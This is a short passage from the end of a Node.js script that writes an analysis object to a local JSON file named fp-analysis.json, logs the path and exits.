const outPath = resolve('fp-analysis.json');
const serialized = JSON.stringify(analysis, null, 2);
writeFileSync(outPath, serialized, 'utf-8');
console.log(`\n[INFO] Full analysis written to ${outPath}`);

process.exit(0);